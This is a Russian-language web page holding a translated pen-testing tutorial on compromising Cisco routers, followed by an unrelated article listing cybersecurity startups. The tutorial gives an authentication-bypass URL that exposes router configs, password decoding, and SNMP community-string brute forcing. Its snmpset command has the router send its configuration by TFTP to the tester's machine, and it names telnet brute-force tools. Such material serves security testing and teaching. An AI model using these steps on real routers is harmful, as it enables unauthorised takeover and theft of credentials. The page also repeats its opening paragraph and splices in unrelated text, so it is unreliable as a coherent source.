Это первая из серии статей, описывающих распознавание и использование
уязвимостей в Cisco маршрутизаторах. Ниже мы рассмотрим анализ файла конфигурации
маршрутизатора. Дополнительно, мы обсудим возможности того, что можно сделать
при достижении доступа к устройству. В этой статье мы уделили много внимания
Cisco маршрутизаторам, из-за их подавляющего количества на рынке.
Марк Вольфанг, перевод SecurityLab.ru
Это первая из серии статей, описывающих распознавание и использование
уязвимостей в Cisco маршрутизаторах. Ниже мы рассмотрим анализ файла конфигурации
маршрутизатора. Дополнительно, мы обсудим возможности того, что можно сделать
при достижении доступа к устройству. В этой статье мы уделили много внимания
Cisco маршрутизаторам, из-за их подавляющего количества на рынке.
Пен-тестеры часто проверяют более эффективные или интересные
системы на возможность взлома, типа уязвимой системы Solaris 8, или Microsoft
2000 Server, уязвимой к недавно найденой “дырке” в RPC DCOM, оставляя
без внимания стандартные сетевые устройства. Я посоветовал бы пен-тестеру дважды
подумать прежде, чем игнорировать эти критические системы. Клиент может сказать:
– “служба telnet является доступной для каждого пользователя Internet”,
или “я нуждаюсь в открытом протоколе SNMP, для управления моими устройствами”.
Это единственные службы (хотя и не обязательно уязвимые из-за ошибок в коде),
которые дают пен-тестеру (или хакеру) более чем достаточные возможности для
компрометации устройства. Также важно, что бы эти сетевые устройства были полностью
защищены, надежны, и доступны в сети.
Полное управление устройством маршрутизации часто может привести
к полному управлению сетью, или используя опознавательные мандаты от маршрутизатора
на других сетевых устройствах и системах, или действуя более удаленно и отклоняя
через независимую систему, некоторый трафик направленный адресату.
Маршрутизаторы могут быть сконфигурированы точно
также как и любая другая система в сети – они могут использоваться как WEB сервер,
ssh демон, chargen, и др. По этой причине, в маршрутизаторах часто могут появляться
ошибки, как и в Unix системах. Вероятно самый легкий и наиболее точный путь
идентификации хоста в сети как маршрутизатора – это использование  Nmap
– сканера портов с очень точным снятием системных характеристик. Ниже представлен
типичный скан портов Cisco маршрутизатора:
(The 168 ports scanned but not shown below are in state: closed)
Port State Service
7/tcp open echo
9/tcp open discard
13/tcp open daytime
19/tcp open chargen
23/tcp open telnet
79/tcp open finger
2001/tcp open dc
4001/tcp open unknown
6001/tcp open X11:1
9001/tcp open unknown
Remote operating system guess: Cisco Router/Switch with IOS 11.2
Если доступна служба регистрации типа telnet или
SSH, то можно использовать стандартный telnet клиент и соединяться с соответствующим
портом. Стандартный Cisco маршрутизатор отвечает примерно следующим образом:
[root@hackyou root]# telnet router1
Trying router1…
Connected to router1.
Escape character is ‘^]’.
User Access Verification
Password:
Строка “User Access Verification” является торговой
маркой баннера Cisco telnet. Но нельзя полагаться только на одни баннеры, так
как системные администраторы иногда специально изменяют их.
SING
– средство, с помощью которого можно компоновать настраиваемые ICMP пакеты,
перехватывать ICMP запросы. Маршрутизаторы – это единственные устройства, которые
отвечают на этот тип ICMP пакетов. Ответ на этот тип (как и на другие типы)
ICMP пакетов, может помочь нам идентифицировать систему как маршрутизатор.
Существуют и другие методы, но обычно для подключения
и определения устройства как маршрутизатор, используется Telnet клиент или NetCat .
Сканеры уязвимостей обычно хорошо идентифицируют известные
уязвимости, но они часто могут пропускать существенные ошибки в конфигурации.
В большинстве испытаний на проникновение, у сканеров уязвимости может быть неплохой
старт, но они неадекватно ведут себя в случае присутствия человеческого фактора,
который входит в эти испытания.
В настоящее время существует крайне мало уязвимостей, которые могут привести
к прямой компрометации Cisco IOS устройств. Плохое администрирование ведет к
компрометации маршрутизаторов намного чаще, чем эксплуатация ранее обнаруженных
программных ошибок.
Уязвимость, которая затрагивает большинство маршрутизаторов
Cisco (когда условия равны) – HTTP
Configuration Arbitrary Administrative Access Vulnerability . Эту специфическую
уязвимость обнаруживают большинство сканеров уязвимости, и в тоже время она
слишком банальна для эксплуатации. Эта уязвимость позволяет полное удаленное
административное управление над целевым маршрутизатором. Инструмент пен-тестера
в данном случае – просто web-браузер.
Сначала, пен-тестер запустит свой web-браузер и зайдет на
Web страницу уязвимого маршрутизатора. Это будет выглядеть примерно так:
Рисунок 1: Стандартная HTTP идентификация пользователя в Cisco маршрутизаторе.
После нажатия кнопки “Cancel”, пен тестер вводит
следующий URL в адресную строку: Http://10.0.1.252/level/99/exec/show/config, 
который отобразит ему стартовую конфигурацию устройства.
Рисунок 2. Отображение конфигурации маршрутизатора Cisco.
Уязвимость раскрывает конфигурацию атакуемого маршрутизатора,
используемые интерфейсы, списки управления доступом (Aсl), SNMP строки, и легко
расшифровываемые пароли!
Из трех различных методов хранения паролей в IOS,
сетевой администратор выбрал Vigenere – легко обратимую схему кодирования.
В этом случае, я запускаю свободно доступный инструмент GetPass и немедленно
перевожу “хеш” в нормальный текст.
Существуют и другие программы для декодирования паролей, причем большинство
из них бесплатные. Также есть web-страницы со CGI сценариями, которые выполняют
декодирование, несколько Unix программ, и даже программное обеспечение для карманных
компьютеров. Однажды взломав ваш пароль, пен-тестер регистрируется с помощью
telnet и получает полный административный доступ к маршрутизатору.
Как было упомянуто, в IOS существуют три
метода, которые используются для представления паролей в файле конфигурации
маршрутизатора. Это:
Очевидно, что наиболее безопасной опцией является
одностороннее MD5 хеширование, которое по своей природе не может быть декодировано.
Данная опция включается с помощью команды, “enable secret 0 password”.
Конечно, вы можете считать, что уязвимость, найденная более
двух лет назад, к настоящему времени должна была бы быть уничтоженной, но это
не так. Я, главным образом, нахожу её на тестируемых маршрутизаторах во внутренних
сетях, но это не говорит, что не существует машрутизатора, сконфигурированного
подобным образом и доступного из Internet.
Предыдущий раздел демонстрирует эксплуатацию ошибки
в Cisco IOS, которая дает возможность получить полное удаленное административное
управление. Из-за природы IOS, и небольшого количества подобных ошибок, я не
собираюсь обсуждать данную тему слишком подробно. В этом разделе мы исследуем
два различных вида перебора в “лоб”.
Существуют несколько различных программых средств для “лобового”
перебора SNMP, и это обычно является довольно безопасным и “тихим”
путем для нападения на граничный маршрутизатор. Если у вас есть лицензия на
пакет программ сетевого управления , то вы сможете узнать, что существует довольно
много программ для оценки Cisco маршрутизаторов пен-тестерами. Однако, для SNMP
целесообразней использовать бесплатный сканер SNMP ADMsnmp . ADMsnmp это консольное приложение,
которое довольно быстро обрабатывает список слов, позволяя вам узнать о любых
community строках. Для определения этого списка я обычно захожу на интересующий
меня сайт и пытаюсь собрать как можно больше информации о нем. После этого я
беру несколько акронимов, имен и служб, и пробую все эти слова. Если, при использовании
этих слов, мне не повезет, то я буду использовать более объемный словарь wordfile.
Linux поставляется с wordfile (/usr/share/dict/words), содержащим 45427 слов.
Wordfiles всех форм и размеров доступны в изобилии. Некоторые из них написаны 
на разных языках, некоторые имеют общие темы, а другие содержат слова, которые
абсолютно чужды вам.
Ниже представлен скриншот ADMSNMP предположительных
community строк. Обратите внимание на различия, между тем, что появляется на
экране, сообщающем пользователю о предполагаемых community строках, и соответственным 
уровнем привилегий.
Строка “send setrequest” в вышеупомянутом изображении,
позволяет пользователю узнать о том, что он получил привилегии для чтения/записи
на устройстве. Первое, что я обычно делаю после получения этого уровня доступа,
это переход к MIB (Management Information Base), для того, чтобы больше узнать
об устройстве.
[root@hackyou root]# snmpwalk -v 1 -c duckling 10.0.1.252 | head
SNMPv2-MIB::sysDescr.0 = STRING: Cisco Internetwork Operating System
Software
IOS ™ 2500 Software (C2500-I-L), Version 12.0(14), RELEASE SOFTWARE
(fc1)
Copyright (c) 1986-2000 by cisco Systems, Inc.
Compiled Tue 31-Oct-00 23:59 by linda
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.9.1.30
SNMPv2-MIB::sysUpTime.0 = Timeticks: (103607424) 11 days, 23:47:54.24
SNMPv2-MIB::sysContact.0 = STRING:
SNMPv2-MIB::sysName.0 = STRING: ADMsnmp
SNMPv2-MIB::sysLocation.0 = STRING:
SNMPv2-MIB::sysServices.0 = INTEGER: 6
Как только я узнаю, что устройство – маршрутизатор, и запущен IOS Cisco, то
я сделаю так, чтобы маршрутизатор послал свой файл конфигурации одной из моих
систем, использующих TFTP. Это делается с помощью следующей команды:
[root@hackyou root]# snmpset 10.0.1.252 duckling
.1.3.6.1.4.1.9.2.1.55.192.168.1.15 s “config”
enterprises.9.2.1.55.192.168.1.15 = “config”
Теперь я проверю свой tftpboot каталог, и вижу,
что файл конфигурации маршрутизатора загружен на мою систему. Solarwinds включает
GUI инструмент под Windows, который делает тоже самое, но я предпочитаю работать
в Linux, поэтому использую UCD-SNMP утилиты.
Solarwinds MIB браузер также может быть полезен, если SNMP
является единственным механизмом для обращения к устройству. Иногда можно даже
включить Telnet через MIB устройства. Конечно то, что можно делать через SNMP,
зависит от производителя и от того, как они решают использовать SNMP.
Ниже показан основной MIB на Cisco устройстве. Используя
Solarwinds, вы можете просматривать информацию через MIB, и дважды кликнув на
тех элементах, которые вы хотите установить или получить, приложение само выполнит
работу.
Рисунок 5: Solarwinds MIB браузер на Cisco устройстве
Перебор “в лоб” в идентификационных (login)
службах типа Telnet или SSH, несколько труднее, но такой вид атаки
может дать положительные результаты для пен-тестера. Первое, что необходимо
сделать перед проведением такого вида атаки, это определение того, что маршрутизатор
действительно использует некоторый тип расширенной идентификации, такой как
Tacacs или Radius. Хотя IOS и не имеет никаких собственных
средств блокировки пользователей, после N-го числа попыток входа в систему,
но блокировку можно активизировать, когда идентификация проходит в другой системе
через Tacacs или Radius. Самым легким способом сообщения того,
что идентификацию проходят в другой системе, является соединение с маршрутизатором,
использующим стандартного Telnet клиента.
root@hackyou root]# telnet router2
Trying router2…
Connected to router2.
Escape character is ‘^]’.
User Access Verification
Username:
Если устройство запрашивает имя пользователя, то вы можете
быть уверены в том, что в данном случае используется некоторая форма расширенной
идентификации. В этом случае, используется Tacacs, и перебор “в лоб”,
в данном случае затруднителен, т.к. пен-тестеру необходимо угадать две переменные:
имя пользователя и пароль, вместо одного пароля. Если запущен finger, то имена
пользователя могут быть собраны, но возможность блокировки учетной записи пользователя,
вероятно, остановит большинство пен-тестеров от проведения такого вида нападений.
Если определено, что расширенная идентификация не
используется, то пен-тестер может выполнить перебор “в лоб” Telnet
демона, почти таким же способом, как и с SNMP. Brutus – инструмент перебора “в лоб”
на базе ОС Windows, который поддерживает множество различных протоколов, и может
быть “на лету” настроен для новых протоколов. Другим превосходным
средством для перебора “в лоб”, является Hydra . Существуют и другие,
знакомые пен-тестерам, средства, написанные в Expect, Perl и др. языках.
В первой статье из этой серии мы рассмотрели несколько
различных путей получения доступа к Cisco маршрутизатору. Эти методы
ни в коем случае не являются исчерпывающими, но они помогают нам при обычных
уязвимостях и ошибках конфигурации, которые Вы, вероятно, найдете при проведении
испытания на проникновение. Так, на этой стадии, при испытании на проникновение
мы получили доступ к устройству. Что же теперь? В следующей статье мы обсудим,
что нам делать далее…
В статье мы расскажем о наиболее интересных стартапах в области кибербезопасности, на которые следует обратить внимание.
Хотите узнать, что происходит нового в сфере кибербезопасности, – обращайте внимание на стартапы, относящиеся к данной области. Стартапы начинаются с инновационной идеи и не ограничиваются стандартными решениями и основным подходом. Зачастую стартапы справляются с проблемами, которые больше никто не может решить.
Обратной стороной стартапов, конечно же, нехватка ресурсов и зрелости. Выбор продукта или платформы стартапа – это риск, требующий особых отношений между заказчиком и поставщиком . Однако, в случае успеха компания может получить конкурентное преимущество или снизить нагрузку на ресурсы безопасности.
Ниже приведены наиболее интересные стартапы (компании, основанные или вышедшие из «скрытого режима» за последние два года).
Компания Abnormal Security, основанная в 2019 году, предлагает облачную платформу безопасности электронной почты, которая использует анализ поведенческих данных для выявления и предотвращения атак на электронную почту. Платформа на базе искусственного интеллекта анализирует поведение пользовательских данных, организационную структуру, отношения и бизнес-процессы, чтобы выявить аномальную активность, которая может указывать на кибератаку. Платформа защиты электронной почты Abnormal может предотвратить компрометацию корпоративной электронной почты, атаки на цепочку поставок , мошенничество со счетами, фишинг учетных данных и компрометацию учетной записи электронной почты. Компания также предоставляет инструменты для автоматизации реагирования на инциденты, а платформа дает облачный API для интеграции с корпоративными платформами, такими как Microsoft Office 365, G Suite и Slack.
Копания Apiiro вышла из «скрытого режима» в 2020 году. Ее платформа devsecops переводит жизненный цикл безопасной разработки «от ручного и периодического подхода «разработчики в последнюю очередь» к автоматическому подходу, основанному на оценке риска, «разработчики в первую очередь», написал в блоге соучредитель и генеральный директор Идан Плотник . Платформа Apiiro работает, соединяя все локальные и облачные системы управления версиями и билетами через API. Платформа также предоставляет настраиваемые предопределенные правила управления кодом. Со временем платформа создает инвентарь, «изучая» все продукты, проекты и репозитории. Эти данные позволяют лучше идентифицировать рискованные изменения кода.
Axis Security Application Access Cloud – облачное решение для доступа к приложениям , построенное на принципе нулевого доверия. Он не полагается на наличие агентов, установленных на пользовательских устройствах. Поэтому организации могут подключать пользователей – локальных и удаленных – на любом устройстве к частным приложениям, не затрагивая сеть или сами приложения. Axis вышла из «скрытого режима» в 2020 году.
BreachQuest, вышедшая из «скрытого режима» 25 августа 2021 года, предлагает платформу реагирования на инциденты под названием Priori. Платформа обеспечивает большую наглядность за счет постоянного отслеживания вредоносной активности. Компания утверждает, что Priori может предоставить мгновенную информацию об атаке и о том, какие конечные точки скомпрометированы после обнаружения угрозы.
Cloudrise предоставляет услуги управляемой защиты данных и автоматизации безопасности в формате SaaS. Несмотря на свое название, Cloudrise защищает как облачные, так и локальные данные. Компания утверждает, что может интегрировать защиту данных в проекты цифровой трансформации. Cloudrise автоматизирует рабочие процессы с помощью решений для защиты данных и конфиденциальности. Компания Cloudrise была запущена в октябре 2019 года.
Cylentium утверждает, что ее технология кибер-невидимости может «скрыть» корпоративную или домашнюю сеть и любое подключенное к ней устройство от обнаружения злоумышленниками. Компания называет эту концепцию «нулевой идентичностью». Компания продает свою продукцию предприятиям, потребителям и государственному сектору. Cylentium была запущена в 2020 году.
Компания Deduce , основанная в 2019 году, предлагает два продукта для так называемого «интеллектуального анализа личности». Служба оповещений клиентов отправляет клиентам уведомления о потенциальной компрометации учетной записи, а оценка риска идентификации использует агрегированные данные для оценки риска компрометации учетной записи. Компания использует когнитивные алгоритмы для анализа конфиденциальных данных с более чем 150 000 сайтов и приложений для выявления возможного мошенничества. Deduce заявляет, что использование ее продуктов снижает ущерб от захвата аккаунта более чем на 90%.
Автоматизированная платформа безопасности и соответствия Drata ориентирована на готовность к аудиту по таким стандартам, как SOC 2 или ISO 27001. Drata отслеживает и собирает данные о мерах безопасности, чтобы предоставить доказательства их наличия и работы. Платформа также помогает оптимизировать рабочие процессы. Drata была основана в 2020 году.
FYEO – это платформа для мониторинга угроз и управления доступом для потребителей, предприятий и малого и среднего бизнеса. Компания утверждает, что ее решения для управления учетными данными снимают бремя управления цифровой идентификацией. FYEO Domain Intelligence («FYEO DI») предоставляет услуги мониторинга домена, учетных данных и угроз. FYEO Identity будет предоставлять услуги управления паролями и идентификацией, начиная с четвертого квартала 2021 года. FYEO вышла из «скрытого режима» в 2021 году.
Kronos – платформа прогнозирующей аналитики уязвимостей (PVA) от компании Hive Pro , основанная на четырех основных принципах: предотвращение, обнаружение, реагирование и прогнозирование. Hive Pro автоматизирует и координирует устранение уязвимостей с помощью единого представления. Продукт компании Artemis представляет собой платформу и услугу для тестирования на проникновение на основе данных. Компания Hive Pro была основана в 2019 году.
Израильская компания Infinipoint была основана в 2019 году. Свой основной облачный продукт она называет «идентификация устройства как услуга» или DIaaS , который представляет собой решение для идентификации и определения положения устройства. Продукт интегрируется с аутентификацией SSO и действует как единая точка принуждения для всех корпоративных сервисов. DIaaS использует анализ рисков для обеспечения соблюдения политик, предоставляет статус безопасности устройства как утверждается, устраняет уязвимости «одним щелчком».
Компания Kameleon , занимающаяся производством полупроводников, не имеет собственных фабрик и занимает особое место среди поставщиков средств кибербезопасности. Компания разработала «Блок обработки проактивной безопасности» (ProSPU). Он предназначен для защиты систем при загрузке и для использования в центрах обработки данных, управляемых компьютерах, серверах и системах облачных вычислений. Компания Kameleon была основана в 2019 году.
Облачная платформа безопасности данных Open Raven предназначена для обеспечения большей прозрачности облачных ресурсов. Платформа отображает все облачные хранилища данных, включая теневые облачные учетные записи, и идентифицирует данные, которые они хранят. Затем Open Raven в режиме реального времени отслеживает утечки данных и нарушения политик и предупреждает команды о необходимости исправлений. Open Raven также может отслеживать файлы журналов на предмет конфиденциальной информации, которую следует удалить. Компания вышла из «скрытого режима» в 2020 году.
Компания Satori, основанная в 2019 году, называет свой сервис доступа к данным “DataSecOps”. Целью сервиса является отделение элементов управления безопасностью и конфиденциальностью от архитектуры. Сервис отслеживает, классифицирует и контролирует доступ к конфиденциальным данным. Имеется возможность настроить политики на основе таких критериев, как группы, пользователи, типы данных или схема, чтобы предотвратить несанкционированный доступ, замаскировать конфиденциальные данные или запустить рабочий процесс. Сервис предлагает предварительно настроенные политики для общих правил, таких как GDPR , CCPA и HIPAA .
Компания Scope Security недавно вышла из «скрытого режима», будучи основана в 2019 году. Ее продукт Scope OmniSight нацелен на отрасль здравоохранения и обнаруживает атаки на ИТ-инфраструктуру, клинические системы и системы электронных медицинских записей . Компонент анализа угроз может собирать индикаторы угроз из множества внутренних и сторонних источников, представляя данные через единый портал.
Основным продуктом Strata является платформа Maverics Identity Orchestration Platform . Это распределенная мультиоблачная платформа управления идентификацией. Заявленная цель Strata – обеспечить согласованность в распределенных облачных средах для идентификации пользователей для приложений, развернутых в нескольких облаках и локально. Функции включают в себя решение безопасного гибридного доступа для расширения доступа с нулевым доверием к локальным приложениям для облачных пользователей, уровень абстракции идентификации для лучшего управления идентификацией в мультиоблачной среде и каталог коннекторов для интеграции систем идентификации из популярных облачных систем и систем управления идентификацией. Strata была основана в 2019 году.
SynSaber , запущенная 22 июля 2021 года, предлагает решение для мониторинга промышленных активов и сети. Компания обещает обеспечить «постоянное понимание и осведомленность о состоянии, уязвимостях и угрозах во всех точках промышленной экосистемы, включая IIoT, облако и локальную среду». SynSaber была основана бывшими лидерами Dragos и Crowdstrike.
Traceable называет свой основной продукт на основе искусственного интеллекта чем-то средним между брандмауэром веб-приложений и самозащитой приложений во время выполнения. Компания утверждает, что предлагает точное обнаружение и блокирование угроз путем мониторинга активности приложений и непрерывного обучения, чтобы отличать обычную активность от вредоносной. Продукт интегрируется со шлюзами API. Traceable была основана в июле 2020 года.
Компания Wiz, основанная командой облачной безопасности Microsoft, предлагает решение для обеспечения безопасности в нескольких облаках, рассчитанное на масштабную работу. Компания утверждает, что ее продукт может анализировать все уровни облачного стека для выявления векторов атак с высоким риском и обеспечивать понимание, позволяющее лучше расставлять приоритеты. Wiz использует безагентный подход и может сканировать все виртуальные машины и контейнеры. Wiz вышла из «скрытого режима» в 2020 году.
Работает на CMS “1С-Битрикс: Управление сайтом”
v-marketcc approved1su